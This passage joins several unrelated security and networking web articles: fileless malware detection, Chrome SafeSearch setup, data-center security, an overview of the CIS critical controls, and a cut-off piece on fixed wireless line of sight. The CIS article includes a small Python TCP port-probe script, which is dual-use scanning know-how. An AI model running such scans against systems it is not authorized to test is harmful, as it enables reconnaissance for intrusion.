Once fileless malware has compromised one of these trusted tools, the attacker will leverage it to execute malicious code in the infected system. The attacker can then surreptitiously move through the network, compromising and exfiltrating critical data, using these “safe” applications to hide their presence. Once fileless malware gets a foothold in the system, it may try to remain there using persistence mechanisms like hiding malicious code in the system registry or using native tools like Windows Task Scheduler to automatically reinfect the system at predetermined times.
Hackers can employ these attacks to perform a range of malicious activities including encrypting and exfiltrating data and compromising other systems in the environment. The most critical thing to remember about fileless malware, though, is that it leaves no obvious footprint. How then do you discover and stop a fileless attack?
How to Detect Fileless Malware
Because fileless malware attacks target the trusted tools used daily by virtually every enterprise, they are exceedingly difficult to deal with. Effective defense and detection require a combination of old-fashioned prevention and cutting-edge technology.
The best way to handle such attacks is to not allow the malware into your systems in the first place. As with many threats, fileless malware relies in part on unpatched applications and software or hardware vulnerabilities to gain entry. Keeping on top of updates and patches is essential for limiting the number of potential entry points attackers can exploit.
Fileless attackers also use phishing and social engineering to deposit their payloads. That makes cybersecurity awareness training for your staff critical. Emphasizing basic security practices such as visiting only secure websites and training employees to exercise extreme caution when opening email attachments can go a long way toward keeping fileless malware at bay.
But in a threat landscape that changes rapidly, one hundred percent immunity from attacks is impossible. Since signature-, rule, and scan-based detection is useless against fileless malware, looking for anomalous behavior is the best way to ferret out these threats.
Instead of looking for malicious files, behavioral analysis identifies out-of-the-ordinary and suspicious activity. A user accessing databases they never have previously, or logging in at unusual hours, could indicate compromise due to fileless malware. An endpoint protection platform that uses machine-learning-driven behavioral analytics to identify what is normal behavior for users and applications in real time, and to flag suspect activity for further investigation, can prevent or limit the damage caused by fileless attacks.
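One practical way to feed those analytics is to raise visibility into the very tools fileless malware abuses. As a hedged example, the PowerShell sketch below enables script block logging on a single Windows machine via the local policy registry key (in a domain this is normally pushed by Group Policy) and then pulls recent logged script blocks for review.

```powershell
# Enable PowerShell Script Block Logging (local policy; run as Administrator)
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord

# Logged script blocks land in the PowerShell Operational log as event ID 4104
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -MaxEvents 50 |
    Where-Object Id -eq 4104 |
    Select-Object TimeCreated, Message
```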
Extended Endpoint Protection
Typical endpoint protection solutions use machine learning to generate models every 4 to 6 months to identify malicious files before they execute. The problem with this approach is that businesses must manage decreasing accuracy over time and deal with false positives.
In simple terms, it would be ideal if, before any application, binary, or video executes, a near-instant check could look for a "goodware" or "badware" signature. If no signature exists, an automated check leveraging responsive machine learning would then help decide what to do.
Unlike solutions that generate models every 4 to 6 months to identify malicious files, Alert Logic Extended Endpoint Protection automatically gathers thousands of samples a day and uses machine learning to analyze these samples to improve coverage and accuracy.
Customers then transparently receive new models to get the best protection. The end result is fewer false positives because the model has already been trained with the specific software that customers are running.
From the perspective of the end-user, this protection adds 1/5 of a second to the time it takes to open an application. The negligible difference in performance is worth the added protection and probably beats Whac-A-Mole any day.
Alert Logic’s endpoint protection intelligently blocks attacks through a combination of machine-learning and attribute analysis, and real-time behavior analysis and provides deep CPU-level visibility without impacting performance. Our next-generation endpoint coverage dynamically combines machine-learning and behavior indicators to identify and block malicious techniques and malware in real-time.
You can learn more about Alert Logic Extended Endpoint Protection here: https://www.alertlogic.com/why-alert-logic/comprehensive-coverage/extended-endpoint-protection/ | <urn:uuid:18218b01-eb11-4622-b48e-fc36be2ee131> | CC-MAIN-2024-38 | https://www.alertlogic.com/blog/how-to-prevent-fileless-malware-attacks/ | 2024-09-18T11:04:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00156.warc.gz | en | 0.922598 | 1,801 | 2.671875 | 3 |
The internet is an incredible resource, but it can also be a dangerous place for children. This tech-savvy generations thrives on technology, regularly searching the web for content, games, and videos. Devices are now commonplace in the classroom, where rules and regulations are required for digital safety. Tools like content filters and online monitoring help educators keep their students safe from inappropriate or dangerous online content. But as we know, technology is not limited to school time, it’s in our homes and accessible to our kids.
A recent study revealed that nearly 55% of parents are concerned by their children's superior ability to navigate the digital world. Despite that concern, over a third of those parents are educating themselves as much as they can about online safety, and learning how to set Chrome SafeSearch is one of those ways.
Why Should Parents Want to Set Chrome SafeSearch
Technology can often be overwhelming for parents who are not familiar with it or see the ease at which their kids use their own devices. The web can provide kids with lots of fun and entertaining content that is age appropriate, but it can also be easy for them to come across website, images or videos that are questionable. Chrome’s SafeSearch is an easy feature for parents to learn how to enable so they can help protect their kids from online dangers at home.
What Does Chrome SafeSearch Block
Chrome's SafeSearch feature is a fantastic way to make sure your children do not stumble across adult or inappropriate content online. Once enabled, searches done through Chrome will filter your results to block explicit content by default, including:
- Sexually explicit material
- Graphic violence and gore
How to Set Chrome SafeSearch
If you are uncomfortable with the level of potentially explicit content that could be in your Google Search results, you can set Chrome to automatically filter these out. This will help make sure that any inappropriate or offensive content is not displayed when you search for something in Chrome whether on a desktop or mobile device.
Set Chrome SafeSearch on a desktop:
- Open your Chrome browser and log into your Google Account
- Go to the Google homepage
- In the bottom right corner click Settings
- Click Search Settings from the pop-up
- At the top of the page select Turn on SafeSearch
- Scroll to the bottom and click the Save button
Set Chrome SafeSearch on a mobile device:
- Open your mobile browser and go to SafeSearch Settings
- To turn on SafeSearch, toggle on Explicit results filter
- To turn off SafeSearch, toggle off Explicit results filter
- When finished, click Back to return to the Google homepage
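Keep in mind that a setting toggled in the browser can just as easily be toggled back. On a shared family computer running Windows, one way to lock the setting in place is Chrome's ForceGoogleSafeSearch policy. The one-line sketch below applies it through the registry from an elevated command prompt; treat it as an example to adapt, and delete the value to undo it.

```
reg add "HKLM\SOFTWARE\Policies\Google\Chrome" /v ForceGoogleSafeSearch /t REG_DWORD /d 1 /f
```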
Chrome SafeSearch at Home and at School
Kids deserve to have a fun and safe online experience, whether they are at home or school. Parents do not need to feel overwhelmed with technology and worry about how to safeguard their kids while surfing the web. Chrome SafeSearch can easily be enabled to extend digital safety from the classroom into the living room with just a few simple steps. | <urn:uuid:c095ed09-5397-464f-9ed7-b0d330027200> | CC-MAIN-2024-38 | https://www.netsweeper.com/education-web-filtering/how-to-set-chrome-safesearch | 2024-09-18T11:20:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00156.warc.gz | en | 0.91812 | 610 | 2.703125 | 3 |
Data centers are the fortresses of the Internet age, the keepers of the digital economy’s most valuable assets. Their gates protect the terabytes and petabytes of data, the server racks that harbour the online world’s infrastructure. But as much as these facilities secure the digital realm, they also house a cog in the physical world – people, workers, and visitors. Ensuring the security of both data and individuals demands a delicate balance between physical and digital safeguards, and it’s a balance that can make or break an organization’s security posture.
In this article, we dive deep into the complexities involved in securing data centers from both physical and digital threats. We will explore the latest trends, best practices, and technologies that guardians of data center security employ to keep the bad actors at bay while maintaining the sanctity of the digital realm.
The Nexus of Physical and Digital Security
Data centers are not just about servers and cables. They are living and breathing entities where physical security controls play just as pivotal a role as digital ones. Physical threats like natural disasters, unauthorized access, and internal misuse hold the potential to cause immeasurable damage to the digital infrastructure and the organizations it supports.
Understanding the Threat Landscape
The first step in data center defence is threat assessment. Organizations must understand the spectrum of potential threats – from brute force attacks on physical infrastructure to sophisticated digital penetration – and should conduct regular risk assessments to identify vulnerabilities.
Integrated Security Systems
An effective security strategy integrates physical and digital elements. Security teams leverage CCTV, biometric access controls, and intrusion detection systems alongside firewalls, encryption, and security information and event management (SIEM) solutions to create a comprehensive security architecture.
The Human Factor
Despite the focus on technology, humans remain a significant factor in data center security. Social engineering attacks, physical theft, and simple human error can compromise the most robust security systems.
Access Controls in the Digital Age
Physical Access Control (PAC) systems are responsible for enforcing role-based access policies and physically granting entry to authorized personnel. These systems not only regulate access but also dictate the time and location parameters, ensuring that only the right people enter designated areas.
Tight Integration with Video Surveillance
Video surveillance is a pivotal component of comprehensive security setups. However, its effectiveness hinges on seamless integration with PAC systems. This integration ensures that access events are monitored and recorded accurately, providing a robust layer of security and aiding in forensic analysis when incidents occur.
Multi-Factor Authentication for Identity Assurance
In an era where digital threats loom large, ensuring identity assurance is paramount. Multi-factor authentication (MFA) solutions serve as the bedrock of this assurance, requiring more than just a password or card swipe for access. These solutions, tightly integrated with PAC systems, offer a diverse array of authentication methods. From traditional card and PIN combinations to advanced biometric recognition like fingerprint or facial authentication, MFA provides flexible and secure authentication pathways. Furthermore, MFA can be deployed in combinations of two or even three factors, such as a card, PIN, and biometric scan, for heightened assurance levels.
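To ground the idea, the sketch below implements the time-based one-time password (TOTP) algorithm that many MFA factors rely on, following RFC 6238, in plain Python. The secret is an illustrative test value; real deployments provision per-user secrets and verify codes server-side with tolerance for clock drift.

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password over HMAC-SHA1."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // step)   # 30-second time window
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                               # dynamic truncation
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # illustrative base32 secret, not for production
```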
The Concentric Rings of Physical Security
Physical barriers are the first line of defence for a data center, deterring unauthorized personnel and presenting a formidable obstacle.
The first ring of defence encompasses the exterior perimeter of a facility. This includes robust fences, secure gates, strategically placed bollards, and barriers designed to deter unauthorized access. These physical barriers serve as the initial deterrent against potential threats, providing a formidable barrier to entry.
Moving inward, the focus shifts to the entry points of the facility. This includes not only conventional doorways but also specialized security features like man traps, designed to control the flow of individuals entering and exiting the premises. Entry points are critical junctures where security measures must be stringent to prevent unauthorized access or breaches.
Within the innermost ring lie the internal areas of the facility. Here, the focus shifts to safeguarding sensitive assets such as data halls, cages, and cabinets. Additionally, attention is paid to essential infrastructure components like power rooms and network infrastructure rooms, which are vital for maintaining the operational integrity of the facility.
Digital Security Measures
Digital security solutions are now strongly integrating into physical access protocols, heralding a new era of comprehensive protection. Here’s a glimpse into this convergence:
Cybersecurity Standards in Physical Security
Cybersecurity standards are now extending their reach to encompass physical security solutions. This evolution demands adherence to robust network security measures, data encryption protocols, efficient certificate management, and the implementation of multi-factor authentication mechanisms. These measures ensure that physical access systems meet the same rigorous standards of protection as their digital counterparts.
Mobile Digital Authentication Solutions
The proliferation of mobile digital authentication solutions has revolutionized access control paradigms. Platforms like Duo, Okta, and PingID, initially designed for internal and IT applications, now find utility in physical security. These solutions offer a versatile means of authentication, seamlessly integrating into multi-factor authentication frameworks for physical access. Leveraging the ubiquity and convenience of mobile devices, organizations can enhance security while streamlining access procedures across digital and physical domains.
Emerging Trends in Data Center Security
The pace of technological advancement means that new trends constantly emerge, challenging data center security professionals to stay ahead of the curve.
Artificial Intelligence and Machine Learning
AI and machine learning are revolutionizing security management by not only predicting and preventing security breaches but also by automating threat detection and analyzing extensive data to pinpoint anomalies. Moreover, these technologies enhance security by more accurately identifying and authenticating users, ensuring higher security standards and faster throughput.
Secure Access Service Edge (SASE)
SASE is an emerging security framework that combines network security functions with WAN capabilities to support the dynamic, secure access needs of organizations. This framework is particularly relevant for the hybrid work environments that are becoming increasingly common.
Zero Trust Architecture
A zero-trust architecture operates on the assumption that threats exist both inside and outside the network. This security model advocates for verifying and securing every device trying to connect to an organization’s network, whether inside or outside its perimeters.
The role of the guardians of the data center is more critical than ever, balancing the protection of the physical facility with the security of its digital contents. By employing a combination of sophisticated physical barriers, and advanced digital security measures, and fostering a culture of vigilance and continuous improvement, organizations can maintain the integrity of their data centers in the face of evolving threats.
For data center personnel, the work is never done. Threats – both physical and digital – continue to evolve and must be met with a corresponding evolution in security strategies. As we look to the future, collaboration between physical and digital security professionals will be key, ensuring that data centers remain not just operational but impervious to the myriad threats that lie in wait. | <urn:uuid:7b91a9f3-1d02-404c-a758-20754258c4ee> | CC-MAIN-2024-38 | https://bioconnect.com/2024/04/26/guardians-of-the-gateway-balancing-physical-access-and-digital-security-in-data-centers/ | 2024-09-20T21:26:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00856.warc.gz | en | 0.908751 | 1,401 | 2.640625 | 3 |
Established in 2000, the Center for Internet Security (CIS) is a global, non-profit community of experts that collectively develops tools, solutions, and best practices for increasing cyber security and mitigating cyber risk.
As well as being renowned for their Benchmarks, which are used to reduce configuration-based vulnerabilities in digital assets, they have developed a cyber risk mitigation framework called the CIS critical security controls.
Arranged into 153 safeguards (previously known as sub-controls) divided across 18 controls, the CIS security controls provide organizations with clear best practices and guidance for defending against a wide range of cyber attacks.
In this article, we explore the 18 CIS critical security controls, how each enhances your company’s cybersecurity posture, and why they’re effective at mitigating risk.
Why are the CIS critical security controls important?
The CIS critical security controls are important because they provide organizations with a comprehensive and easy-to-follow framework for strengthening their cybersecurity posture.
Because the CIS security controls consist of a prioritized set of best practices that protect against the most common attack vectors, they’re highly instrumental in reducing a company’s exposure to operational, compliance, financial, and reputational risk.
Additionally, with so many cybersecurity tools, frameworks, and methodologies out there, it’s easy for companies to become overwhelmed by the abundance of information. In contrast, by focusing on a select number of actions based on known attack methods, the CIS critical security controls offer organizations a clear path for effective cyber defense.
What Makes the CIS Controls Effective?
Several aspects make the CIS critical security controls so effective:
- Informed by common cyber attacks: the CIS controls are developed from insights gained from actual cyber attacks and the defensive measures that have been proven effective against them.
- Compiled by experts: the controls, and the safeguards that comprise them, are created and maintained by a global community of experts from all sectors, including IT, security, government, defence, finance, academia, consulting, etc.
- Easy to comprehend and communicate: as they hone in on 18 overarching cybersecurity measures, it’s simple to explain the CIS controls to stakeholders, supply chain partners and non-technical personnel. Subsequently, it’s straightforward to report on their implementation and efficacy to management and other invested parties and for them to follow along.
- Measurable progress: the 18 well-defined controls give organisations a list to work through to strengthen their cybersecurity posture. Better still, each CIS control has a series of safeguards divided into three implementation groups (IGs): IG1, IG2, and IG3, resulting in 153 total safeguards (referred to as sub-controls in previous versions) across the 18 controls. While the safeguards in IG1 provide basic cyber defence for companies just starting their cyber security program, IG3 offers the most comprehensive protection for larger organisations with more stringent defence and compliance requirements. Consequently, the framework enables you to improve your cybersecurity measures as your program matures.
- Mapped against important compliance frameworks: the CIS critical controls have been designed, and are updated, with the most important data privacy regulations and legislation in mind. This makes it easier for organisations to comply with GDPR, HIPAA, PCI DSS, and other frameworks that apply to their industry.
5 Crucial Components of Effective Cyber Defense
The five crucial components of an effective cybersecurity defense plan are:
- Attacks dictate defense: using feedback, i.e., threat intelligence, from actual cyber attacks to provide the information to develop robust, effective defense measures
- Prioritization: developing mechanisms to assess the severity of cyber-attacks and prioritizing actions that most reduce risk exposure- and, preferably, are the most feasible to implement
- Measurements: making use of widely-used metrics to ensure different parts of an organization, whether security personnel, IT teams, C-Suite executives, or other stakeholders, are on the same page with regard to cyber risk mitigation efforts and their efficacy.
- Continuous monitoring: abandoning static, point-in-time testing for continuous monitoring solutions that provide security teams with constant visibility over the IT infrastructure.
- Automation: utilising automated tools wherever possible to identify and assess cyber threats in an ever-expanding attack surface.
What are the 18 CIS Critical Security Controls?
Here’s an overview of the 18 CIS critical security controls.
1. Inventory Management and Control of Enterprise Assets
The first CIS control centers around creating and maintaining an accurate and up-to-date list of your company’s hardware assets, such as workstations, laptops, mobile devices, servers, and Internet of Things (IoT) and network devices. This also includes hardware not directly under your control, like employee mobile devices and those within a cloud environment.
Implementing the actions outlined by this control not only reveals the total number of hardware assets within an organization’s IT infrastructure that require monitoring and protection but also highlights unauthorized and/or unmanaged assets that could be removed to reduce the size of the attack surface.
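Dedicated discovery tools do this job properly, but even a short script can reveal hosts missing from the asset register. The hypothetical Python sketch below probes a /24 subnet for a few common service ports; the subnet and ports are assumptions to adapt, and it should only be run against networks you are authorized to scan.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

SUBNET = "192.168.1."            # assumption: your management subnet
PORTS = (22, 80, 443, 3389)      # a few common service ports

def probe(ip):
    # Report the host as live if any probed port accepts a TCP connection
    for port in PORTS:
        try:
            with socket.create_connection((ip, port), timeout=0.5):
                return ip
        except OSError:
            continue
    return None

with ThreadPoolExecutor(max_workers=64) as pool:
    live = [ip for ip in pool.map(probe, (SUBNET + str(i) for i in range(1, 255))) if ip]

print(f"{len(live)} responsive hosts to reconcile against the inventory:", live)
```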
2. Inventory and Control of Software Assets
A comprehensive inventory of your company’s software enables you to consistently monitor the applications running on your network for security breaches. Tracking all software assets also alerts security teams to unpatched and unsupported applications with known vulnerabilities that hackers could exploit. This is especially vital as malicious actors rely on the gap between an organization becoming aware of a vulnerability and patching it to breach network security.
Additionally, because you can’t manage applications that you can’t monitor, the safeguards within this control prevent the installation of unauthorized software, i.e., shadow IT, and highlight instances found on the network. As well as providing insight into the true extent of a company’s attack surface, it reduces the risk of malware finding its way onto the network because an employee downloaded a compromised application without permission.
3. Data Protection
As companies integrate more digital solutions into their IT ecosystem, data protection becomes increasingly crucial. This is especially true regarding cloud technology, which necessitates that data is transferred over the internet and stored offsite – which means it’s no longer confined within a company’s conventional network perimeters.
CIS control 3 provides essential guidelines for identifying, classifying, tracking, storing, and disposing of data. This includes establishing and maintaining a data management process, securing data on endpoints (including mobile devices), and encrypting sensitive data in transit and at rest.
Plus, while a lot of data loss results from malicious action, it can also occur through lax security practices or human error. Because of this, the safeguards in this control also focus on data loss detection and on mitigating all other forms of data compromise.
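As a small illustration of encryption at rest, the sketch below uses the third-party cryptography package's Fernet recipe (authenticated symmetric encryption). The record content is made up, and in practice the key would live in a key management service or HSM rather than alongside the data.

```python
from cryptography.fernet import Fernet  # pip install cryptography

key = Fernet.generate_key()   # 32 random bytes, urlsafe base64-encoded
cipher = Fernet(key)

# Encrypt before the record is written to disk or shipped to cloud storage
token = cipher.encrypt(b"customer: alice, card ending 4242")

# Only a holder of the same key can recover (and integrity-check) the plaintext
print(cipher.decrypt(token))
```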
4. Secure Configuration of Enterprise Assets and Software
In their default state, i.e., "out of the box", hardware and software often come with settings that can leave your network vulnerable to cyber threats. Hackers can exploit default passwords, basic controls, and insecure configurations if left unchanged, and even a single unchecked error can create security risks that disrupt business continuity.
With this in mind, this control focuses on establishing and maintaining secure configurations for hardware and software assets.
5. Account Management
Alarmingly, unauthorized network access is more likely to result from the misuse of valid user credentials, whether from inside or outside an organization, than from technical exploits. Consequently, CIS critical security control 5 concerns managing user accounts, password policies, and monitoring account activity.
- Create and maintain an inventory of user accounts
- Enforcing strong password hygiene, e.g., ensuring passwords are a certain length, are changed regularly, etc.
- Deactivating unused accounts
- Limiting admin privileges to a small number of accounts
It’s particularly important to protect admin accounts because cybercriminals can use them to modify assets or create additional accounts with special privileges. They can then use them to make their way further into your network, better cover their tracks and implement subsequent steps in their plans.
6. Access Control Management
While control 5 concerns the management of user accounts themselves, this series of safeguards centers around what those accounts are permitted to do – access control management, i.e., user privileges.
Granting overly broad permissions increases insider risk, i.e., intentional or accidental data compromise by employees or supply chain partners, as well as the severity of a security breach if a hacker gains control of a user account. Limiting a user’s access rights to what they need to perform their role (the principle of least privilege) reduces an organization’s cyber risk exposure.
As well as best practices for implementing and maintaining access control systems, this control provides guidelines on granting and revoking permissions with privileged access management (PAM) tools and enabling multi-factor authentication (MFA).
7. Continuous Vulnerability Management
Companies that fail to proactively identify and address IT security flaws are more likely to suffer security breaches and business disruptions. Continuous vulnerability management emphasizes the critical importance of regularly assessing your organization’s cybersecurity posture.
This includes implementing measures to consistently identify, prioritize, and mitigate vulnerabilities within your IT network, whether open ports and misconfigured services or unpatched software and unused user accounts. To achieve this, security teams should follow the prescribed guidelines to establish policies and controls for vulnerability scanning and ensure they consistently obtain up-to-date threat intelligence.
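For flavor, the short Python sketch below performs the most basic kind of attack-surface check, probing a host for open TCP ports. Real vulnerability scanners go far beyond this, and the hostname and port list here are placeholders; only scan hosts you own or are authorized to test.

import socket

HOST = "scanme.example"          # placeholder target
COMMON_PORTS = (22, 80, 443, 3389)

def open_ports(host, ports, timeout=1.0):
    """Return the subset of ports accepting TCP connections."""
    found = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            pass
    return found

print(open_ports(HOST, COMMON_PORTS))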
8. Audit Log Management
Malicious actors know that while some organizations maintain audit logs for compliance purposes, they don’t analyze them consistently. Armed with this knowledge, they can hide within your network for extended periods without detection – and can cover their tracks more effectively.
CIS security control 8 details actions concerning the review and retention of your network’s event logs. Regularly analyzing audit logs enables security teams to identify suspicious activities and respond quickly to mitigate their impact. Its safeguards include the following (a minimal log-review sketch appears after the list):
- Developing and maintaining an audit log management system
- Regularly reviewing audit logs
- Keeping logs for a specified period
- Obtaining logs from service providers
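As a rough illustration of what regularly reviewing audit logs can look like in practice, the Python sketch below counts failed SSH logins per source address. The log path, message format, and alert threshold are all assumptions that vary by platform.

import re
from collections import Counter

FAILED_LOGIN = re.compile(r"Failed password for (?:invalid user )?\S+ from (\S+)")
ALERT_THRESHOLD = 5  # assumed threshold for demonstration

def review_auth_log(lines):
    """Count failed logins per source IP and flag unusually noisy sources."""
    failures = Counter()
    for line in lines:
        match = FAILED_LOGIN.search(line)
        if match:
            failures[match.group(1)] += 1
    return {ip: n for ip, n in failures.items() if n >= ALERT_THRESHOLD}

with open("/var/log/auth.log") as log:  # location differs across systems
    print(review_auth_log(log))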
9. Email and Web Browser Protections
Browsers and email clients are common targets for hackers because of their large user bases and the high frequency with which they’re used. They’re especially susceptible to malware infections and social engineering attacks, which provide cybercriminals with an entry point into networks.
Consequently, the safeguards that comprise this control are designed to prevent phishing, malware downloads, and other web-based cyber attacks. This includes only using fully supported browsers and email applications, setting up filters to block malicious (and suspicious) web addresses and file extensions, and maintaining secure domain name system settings.
10. Malware Defenses
Control 10 provides best practices for preventing the installation and spread of malicious software and code, such as viruses and ransomware. It emphasizes the use of anti-malware solutions to regularly scan your IT ecosystems to detect, contain, and eliminate malware found in endpoints, websites, applications, and network devices.
However, one of the reasons malware is so dangerously effective is that malicious actors are constantly devising new strains – including polymorphic malware that can alter its signature to prevent detection. Because of this, the safeguards in this control call for behavior-based anti-malware tools, which look for patterns indicative of malicious code, as well as signature-based detection, which recognizes known malware.
11. Data Recovery
An essential part of effective incident response is quickly restoring your systems to a secure state after a cyber attack – which requires a reliable data backup and recovery process. The actions laid out in this control help companies implement automated backups, protect and isolate backup data, and test their recovery procedures.
An effective data recovery process helps protect your organization from cyber attacks where hackers gain access to your network and modify settings, create illegitimate user accounts, and install malicious software. Such actions can be difficult to detect and require reverting your ecosystem to a time before the security breach. This control also guards against accidental data deletion, modification, and other human error, which can be rectified with up-to-date backups.
12. Network Infrastructure Management
Network devices, such as switches, routers, and firewalls, are typically configured out of the box for easy setup – not for security. Consequently, hackers search for vulnerabilities in network infrastructure, like weak configurations and default passwords, and exploit them to breach a company’s defensive measures.
To mitigate this, control 12 provides guidelines for setting up, evaluating, reconfiguring, and managing network devices. This begins with clearly documenting all aspects of your network infrastructure and continually monitoring it for modifications that could indicate a security risk.
13. Network Monitoring and Defense
Cybersecurity controls are most effective when they’re part of a continuous monitoring process that allows security personnel to receive and act on alerts, enabling them to promptly contain and mitigate the effects of security incidents.
CIS critical security control 13 covers processes and tools for continuous monitoring and defense, which allow organizations to collect and analyze data on network traffic, manage access control, and generate alerts. Additionally, the safeguards in this control provide best practices on how to filter and control the flow of traffic between sections of your network – making it easier both to manage access to assets and data and to contain cyber attacks if they occur.
14. Security Awareness and Skills Training
Because employees often determine whether a company’s cyber risk mitigation efforts succeed or fail, it’s critical that they’re educated on how their actions can compromise security.
This could be through:
- Using weak passwords or reusing them too often
- Mishandling sensitive data
- Falling for phishing attempts
- Losing a mobile device
- Installing compromised applications
- Visiting compromised sites
For this reason, it’s essential for companies to invest in cybersecurity awareness training that engenders a security-conscious mindset and reduces risk exposure.
A key aspect of this is educating your employees on common cyber attacks – and how to report them, and to whom, if they occur. It’s also imperative to teach the causes of unintentional data exposure and, by extension, how to handle data securely. Additionally, for those within your company who handle the most sensitive data, it’s prudent to provide role-specific training to enhance their situational awareness and skill sets.
15. Service Provider Management
This control recommends assessment, management, and monitoring of third-party service providers that have access to your assets and data – with particular emphasis on protecting sensitive data.
It includes best practices for creating and maintaining an up-to-date inventory of service providers, assessing suppliers to determine their security posture, and securely ending your association (e.g., ensuring they securely dispose of your data) if necessary. The safeguards in CIS security control 15 also include provisions for monitoring the security practices of your third-party providers and for cooperating with them to help them improve their cyber risk mitigation strategies and ensure compliance.
16. Application Software Security
While control 2 is concerned with the cataloguing of software assets and control 15 addresses third-party applications, CIS critical security control 16 details safeguards for custom software development. It provides guidelines on implementing secure application development practices and processes to ensure the ongoing security of bespoke software and systems within your IT ecosystem. This includes creating standardized configuration templates for robust application architecture and mechanisms for identifying, prioritizing, and remediating software vulnerabilities.
Additionally, as development teams integrate third-party components into custom applications, such as frameworks and code libraries, it’s vital to catalogue them so they can be continuously monitored for vulnerabilities. Better still, companies should only use trusted components from reputable vendors with high, independently verified security ratings.
17. Incident Response Management
Despite an organization’s best cyber risk mitigation efforts, attacks will still take place. Consequently, CIS critical security control 17 is about developing and implementing a comprehensive incident response plan (IRP) – also known as a Playbook – that outlines the steps to follow during and after a security event.
Best practices include assigning specific roles and responsibilities to employees in the event of a security incident and establishing protocols for reporting suspected malicious activity. Similarly, you need processes in place for how to communicate in regard to security events – namely, when employees are allowed to discuss a breach and with whom.
It’s also vital to establish a robust process concerning what your staff do after a security event as well as during it. This should include a thorough analysis of the incident to determine how best to prevent it from recurring, and learning as much as possible about the nature of the attack to add to your threat intelligence.
18. Penetration Testing
With new technologies constantly emerging and malicious actors continually developing new attack methods, it’s not enough for organizations to look only for known vulnerabilities or to rely on their existing defense measures.
The final CIS critical security control accounts for this by providing guidelines on performing penetration tests: a proactive cyber risk mitigation strategy that sees security teams attempt to breach, or penetrate, their own security measures to test their effectiveness. In essence, penetration testing requires you to think like a hacker – exploiting the same attack vectors they would.
In addition to testing your implemented cybersecurity measures and fixing those that prove ineffective, penetration tests allow organizations to acquire new threat intelligence and devise ways to reduce their attack surface.
How RiskXchange can help enhance your organization’s cybersecurity posture
Through a thorough analysis of your company’s attack surface, we can determine where you’re most vulnerable to cyber threats. From there, we’ll help implement the CIS critical security controls that best protect your IT infrastructure from cyber attacks.
Contact us to schedule your free trial.
CIS critical security controls FAQs
What is the meaning of CIS Critical Security Controls?
The CIS critical security controls are a risk mitigation framework that provides organizations with a series of best practices for implementing measures to protect against the most common cyber attacks.
There are 18 CIS security controls, each comprising a series of actionable safeguards (153 in total). Part of the simplicity of the CIS controls is that companies don’t have to implement every safeguard – just those that correspond to their level of risk.
What is an example of a CIS cybersecurity control?
Each CIS control is numbered from 1 – 18, so CIS security control 1, for instance, is called Inventory and Control of Enterprise Assets. It details best practices for cataloguing, classifying, and monitoring an organization’s hardware assets so any vulnerabilities can be discovered and mitigated by security teams.
What is the difference between CIS critical security controls and NIST?
While the Center for Internet Security (CIS) is a global nonprofit organization composed of a wide range of experts, the National Institute of Standards and Technology (NIST) is part of the U.S. government (under the Department of Commerce).
Additionally, while CIS controls specifically cover cybersecurity, there are different NIST frameworks with varying scopes – with the NIST Cybersecurity Framework (CSF) designed for cyber risk mitigation. | <urn:uuid:b69993e5-2450-4080-8bcf-9a615a503d66> | CC-MAIN-2024-38 | https://riskxchange.co/1007724/cis-critical-security-controls/ | 2024-09-13T16:06:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00656.warc.gz | en | 0.929049 | 3,930 | 2.75 | 3 |
It has already been established that a properly executed fixed wireless Internet network consistently provides faster and more secure data speeds, and is much easier and less expensive to install, upgrade, and operate. Moreover, its relative independence from fiber and cable networks makes its design, planning, and implementation far faster and more efficient than other options.
One of the major questions that arises when companies are considering a fixed wireless Internet connection concerns line of sight (LOS). This is likely the biggest obstacle fixed wireless providers deal with when developing a network for clients. Below, MHO discusses LOS considerations and explains how line of sight issues are handled with potential clients.
How Important is Line of Sight to Fixed Wireless Internet?
Line of sight refers to a direct view of another object. If you can see the object, however far away, it is in your line of sight. This is important for a microwave radio communications system because the signals operate by line of sight. This means that each radio transmitter and receiver must be in a direct line with, and have a direct view of, other stations.
This is a primary consideration when laying out a proposed fixed wireless network for a potential ISP client. The receiving station must be in a direct line of sight with the transmitting stations and/or base station in order to send and receive signals. Without this alignment, the signals can be blocked and the system is effectively inoperative.
What are Some Barriers to Line of Sight for Fixed Wireless Internet?
Generally, the frequencies at which fixed wireless Internet systems operate require an 80% unobstructed line of sight in order to function properly. Natural or man-made stationary obstacles can interfere with this layout and block the radio signals. These can include:
- Overgrowth of trees
- Buildings and other structures
- Hills and other terrain features
- Bridges
Another consideration with line of sight is the curvature of the earth. At too great a distance, the planet itself becomes a natural barrier to the line of sight required for operation. This problem is usually minimal, since most fixed wireless connections are kept to a maximum distance of about 30 miles.
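For a sense of scale, the standard 4/3-earth-radius rule of thumb from radio engineering estimates how far apart two antennas can be before the curvature of the earth blocks the path. The Python sketch below uses that textbook approximation; it is illustrative, not MHO's planning method.

import math

def radio_horizon_km(antenna_height_m):
    # Common 4/3-earth-radius approximation used in radio link planning.
    return 4.12 * math.sqrt(antenna_height_m)

def max_link_km(tx_height_m, rx_height_m):
    """Rough upper bound on path length before the earth itself blocks LOS."""
    return radio_horizon_km(tx_height_m) + radio_horizon_km(rx_height_m)

# Two 30-meter rooftop installations:
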